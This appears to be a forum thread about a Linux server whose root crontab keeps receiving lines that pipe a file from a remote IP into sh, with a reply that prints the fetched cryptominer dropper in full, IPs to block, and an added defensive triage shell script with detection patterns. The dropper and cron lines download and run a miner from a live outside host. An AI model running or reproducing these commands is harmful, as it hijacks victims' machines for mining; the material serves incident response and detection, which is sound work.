For the last three months, every weekend the following instructions appear in root's cron:
0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh
How do I block this intrusion?
Many thanks
If you wget that image and open it with nano, it contains the following:
#!/bin/sh
rm -rf /tmp/wqbtraqbpv.conf
pkill -f stratum
pkill -f "/tmp/apache"
pkill -f "/tmp/httpd.conf"
pkill -f cryptonight
pkill -f wqbtraqbpv
ps auxf|grep -v grep|grep -v qslulqdbi|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "65.254.63.20"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wqbtraqbpv"|awk '{print $2}'|xargs kill -9
ps -fe|grep qslulqdbi|grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
chmod 777 /tmp/qslulqdbi.conf
rm -rf /tmp/qslulqdbi.conf
curl -o /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
wget -O /tmp/qslulqdbi.conf http://91.230.47.41/img/kworker.conf
chmod 777 /tmp/kauditd
rm -rf /tmp/kauditd
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
curl -o /tmp/kauditd http://91.230.47.41/img/kworker
wget -O /tmp/kauditd http://91.230.47.41/img/kworker
else
curl -o /tmp/kauditd http://91.230.47.41/img/kworker_na
wget -O /tmp/kauditd http://91.230.47.41/img/kworker_na
fi
chmod +x /tmp/kauditd
cd /tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
nohup ./kauditd -c qslulqdbi.conf -t `echo $cores` >/dev/null &
else
echo "runing....."
fi
I would recommend blocking inbound & outbound traffic for:
91.230.47.41
94.23.8.105
37.59.49.7
37.59.51.212
188.165.214.76
176.31.117.82
188.165.254.85
via firewall rules, as well as removing the cron job.
kworker & kworker_na seem to be clean according to VirusTotal ... but I would check your /tmp/kauditd folder and delete them both.
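To make the reply's recommendations repeatable, here is an added example (my own code, not from the thread or either poster) with small POSIX sh helpers: find and strip curl|sh / wget|sh lines from a crontab, pull the contacted hosts out of them, flag running processes that match the indicators in the dropper script (kauditd -c, stratum, cryptonight, the random names), generate the iptables drop rules for the listed IPs, and check /tmp for the dropper's files. The IPs and file names are those on this page; the function names, the sample crontab, the sample ps listing and the --apply switch are assumptions made for the example. Two things the script quoted above supports: `0 * * * *` runs hourly, not weekly, so what reappears every weekend is the cron line itself, and nothing in logo.jpg writes a crontab, so whatever re-plants it (and the root access it needs) lies outside this script; removing the line and blocking the IPs is cleanup, not closure. Also, kauditd and kworker are names of real kernel threads, chosen so the miner blends into ps output; the kernel thread appears as [kauditd] with no arguments, the miner as ./kauditd -c qslulqdbi.conf.

```shell
#!/bin/sh
# Added example for this thread, not code from the original poster or the reply:
# triage helpers for the hourly curl|sh cron dropper shown above. Indicator
# values (the seven IPs, the /tmp names kauditd, qslulqdbi.conf, wqbtraqbpv.conf,
# the strings stratum/cryptonight) come from the thread; the function names,
# the sample crontab/ps listings and the --apply switch are my own constructions.

# A downloader (curl or wget) whose output is piped straight into sh or bash.
DROPPER_RE='(curl|wget)[^|]*[|][[:space:]]*(sh|bash)([[:space:]]|$)'

# Process command-line indicators taken from the dropper script itself.
MINER_RE='kauditd -c|stratum|cryptonight|wqbtraqbpv|qslulqdbi'

# Addresses the reply recommends blocking in both directions.
BLOCK_IPS='91.230.47.41 94.23.8.105 37.59.49.7 37.59.51.212 188.165.214.76 176.31.117.82 188.165.254.85'

# Print the crontab lines (stdin) that download and execute remote code.
find_dropper_lines() { grep -E "$DROPPER_RE" || true; }

# Print the crontab (stdin) with those lines removed; feed this to 'crontab -'.
strip_dropper_lines() { grep -Ev "$DROPPER_RE" || true; }

# Extract the host of every http(s) URL on stdin, deduplicated (more IPs to block).
extract_hosts() { grep -Eo 'https?://[^/[:space:]]+' | cut -d/ -f3 | sort -u; }

# Flag 'ps -eo pid,args' lines (stdin) matching the miner indicators. The real
# kernel thread shows up as '[kauditd]' with no arguments and does not match.
find_miner_processes() { grep -E "$MINER_RE" | grep -v grep || true; }

# Emit iptables commands dropping inbound and outbound traffic for each IP given.
block_rules() {
    for ip in "$@"; do
        printf 'iptables -A INPUT -s %s -j DROP\n' "$ip"
        printf 'iptables -A OUTPUT -d %s -j DROP\n' "$ip"
    done
}

# List which of the dropper's files exist under DIR (default /tmp).
find_artifacts() {
    dir=${1:-/tmp}
    for f in kauditd qslulqdbi.conf wqbtraqbpv.conf; do
        [ -e "$dir/$f" ] && printf '%s\n' "$dir/$f"
    done
    return 0
}

# Constructed sample data: a root crontab and a process listing as they might
# look on the infected host (not captured from a real system).
SAMPLE_CRONTAB='# m h dom mon dow command
17 * * * * cd / && run-parts --report /etc/cron.hourly
0 * * * * curl http://91.230.47.41/img/logo.jpg|sh
0 * * * * wget -O - -q http://91.230.47.41/img/logo.jpg|sh
30 2 * * 0 /usr/local/bin/backup.sh'

SAMPLE_PS='  PID COMMAND
    1 /sbin/init
   23 [kauditd]
  842 /usr/sbin/sshd -D
 2319 ./kauditd -c qslulqdbi.conf -t 2
 2401 sshd: root@pts/0'

if [ "${1:-}" = "--apply" ]; then
    # Live mode (run as root): kill the miner first, then drop the cron lines,
    # block the IPs and delete the files. 'iptables -A' rules are not persistent.
    ps -eo pid,args | find_miner_processes | while read -r pid _; do kill -9 "$pid"; done
    crontab -l | strip_dropper_lines | crontab -
    block_rules $BLOCK_IPS | sh
    find_artifacts /tmp | while read -r f; do rm -f "$f"; done
else
    # Dry run on the embedded sample data.
    echo '== dropper cron lines:';      printf '%s\n' "$SAMPLE_CRONTAB" | find_dropper_lines
    echo '== hosts they contact:';      printf '%s\n' "$SAMPLE_CRONTAB" | find_dropper_lines | extract_hosts
    echo '== miner processes:';         printf '%s\n' "$SAMPLE_PS" | find_miner_processes
    echo '== firewall rules to apply:'; block_rules $BLOCK_IPS
fi
```

Run it without arguments for a dry run on the embedded samples; saved as, say, triage.sh and run as root with `sh triage.sh --apply`, it performs the removal. The kill comes before the file deletion because removing /tmp/kauditd while the process is running leaves the miner in memory, and the rules added with `iptables -A` must be saved with your distribution's persistence mechanism or they disappear at the next reboot.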